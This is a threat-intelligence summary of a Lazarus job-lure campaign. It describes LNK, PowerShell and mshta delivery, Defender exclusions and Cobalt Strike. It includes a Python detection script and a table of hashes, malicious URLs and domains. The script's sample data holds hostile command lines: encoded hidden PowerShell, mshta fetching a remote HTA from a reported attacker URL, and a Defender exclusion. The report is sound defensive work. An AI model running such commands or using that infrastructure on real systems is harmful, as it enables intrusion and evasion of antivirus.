Lazarus repeats its old tricks: the Dream Job operation is staged again

2022-06-02 CN-SEC Lazarus repeats its old tricks, and the Dream Job operation is staged again

https://cn-sec.com/archives/1080507.html


Anheng CERT attributed a renewed Dream Job-style operation to Lazarus after observing Binance developer recruitment lures aimed at job seekers, with cryptocurrency theft as the suspected objective. The delivery chain paired password-protected PDF decoys with a fake Password.txt LNK file that launched obfuscated PowerShell and mshta to retrieve remote HTA code. Later stages decrypted and decompressed AES/Gzip-packed PowerShell, attempted a UAC bypass, added Windows Defender exclusions, and downloaded Cobalt Strike via gdk.exe and jdk.exe. The activity matters because it shows Lazarus reusing its social-engineering pattern against cryptocurrency targets while changing the obfuscation and evasion details; reported infrastructure included crypto.blockchaincapital[.]space, mira.itb.ac[.]id, filebin[.]net, and the Cobalt Strike callback 174.038.24[.]107:80.
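The chain summarised above (PowerShell spawning mshta to fetch a remote HTA, then a Defender exclusion being added, with the report's two domains as network indicators) is the kind of sequence a detection engineer would want to catch from process-creation telemetry. The following is an added example written for this summary, not code from Anheng CERT or the original report: it runs three simple rules over constructed, Sysmon-style process events (hypothetical records modelled on the described chain, not samples from the report) and uses only the two full domains from the indicator table; the field names and rule names are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Full domains taken from the indicator table on this page; the "[.]" defanging
# used in the prose is removed so the strings compare against real URLs.
IOC_DOMAINS = {"crypto.blockchaincapital.space", "mira.itb.ac.id"}

# Constructed sample events (hypothetical, Sysmon-style fields). They mimic the
# chain described in the summary plus two benign look-alikes for false-positive checks.
SAMPLE_EVENTS = [
    {"pid": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAo"},
    {"pid": 2, "parent": "powershell.exe", "image": "mshta.exe",
     "cmd": "mshta.exe https://mira.itb.ac.id/jdk.hta"},
    {"pid": 3, "parent": "mshta.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Add-MpPreference -ExclusionPath C:\\Users\\Public"},
    {"pid": 4, "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\Scripts\\backup.ps1"},          # benign
    {"pid": 5, "parent": "chrome.exe", "image": "mshta.exe",
     "cmd": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},        # local HTA, benign
]

REMOTE_HTA = re.compile(r"https?://[^\s\"']+\.hta\b", re.IGNORECASE)
DEFENDER_EXCLUSION = re.compile(
    r"Add-MpPreference\s+.*-Exclusion(Path|Process|Extension)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class Alert:
    pid: int
    rule: str


def host_of(url: str) -> str:
    """Return the lower-cased host part of an http(s) URL, or '' if none."""
    m = re.match(r"https?://([^/:\s]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def detect(events) -> list:
    """Apply the three rules to a list of process-creation events."""
    alerts = []
    for ev in events:
        cmd, image, parent = ev["cmd"], ev["image"].lower(), ev["parent"].lower()

        # Rule 1: mshta pulling an HTA over the network, launched by a script host.
        # A local HTA started by a browser or installer (pid 5) does not match.
        if image == "mshta.exe" and parent in SCRIPT_HOSTS and REMOTE_HTA.search(cmd):
            alerts.append(Alert(ev["pid"], "mshta_remote_hta_from_script_host"))

        # Rule 2: a Defender exclusion being added from a command line.
        if DEFENDER_EXCLUSION.search(cmd):
            alerts.append(Alert(ev["pid"], "defender_exclusion_added"))

        # Rule 3: any URL in the command line whose host is a reported domain.
        for url in URL.findall(cmd):
            if host_of(url) in IOC_DOMAINS:
                alerts.append(Alert(ev["pid"], "ioc_domain_contact"))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid={a.pid} rule={a.rule}")
```

Rules 1 and 2 are behavioural and keep firing after the attacker rotates infrastructure; rule 3 is the indicator match and only covers the two complete domains, since the truncated URLs in the table cannot be turned into reliable patterns. In practice the parent check in rule 1 should be tuned to the script hosts actually present in the environment.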

Indicators of Compromise

Type     Value                              First Seen   Last Seen
HASH     52b0b06ab4cf6c6b1a13d8eec2705e3b   2022-06-02   2022-06-22
HASH     89a80c1c39b87754009faf72d6def876   2022-06-02   2022-06-02
HASH     9fc45cd7301e1f3f3f98b8d91820aaa1   2022-06-02   2022-06-02
HASH     c8b2556411ff2ce57c5ae6f44d98ad35   2022-06-02   2022-06-02
URL      https://crypto.blockchaincapita…   2022-06-02   2022-06-02
URL      https://mira.itb.ac.id/jdk.hta     2022-06-02   2022-06-02
URL      https://crypto.blockchaincapita…   2022-06-02   2022-06-02
URL      https://crypto.blockchaincapita…   2022-06-02   2022-06-02
URL      https://filebin.net/wc3oofuc28p…   2022-06-02   2022-06-02
DOMAIN   crypto.blockchaincapital.space     2022-06-02   2022-06-02
DOMAIN   mira.itb.ac.id                     2022-06-02   2022-06-02
HASH     03933959de20c3d1d40567b7d7fc4f7e   2022-06-02   2022-06-02
HASH     bc2eab8dfc5a0f85eb04eeb1fa19eb91   2022-06-02   2022-06-02
HASH     1364f98ccac7821d101950f716f07437   2022-06-02   2022-06-02
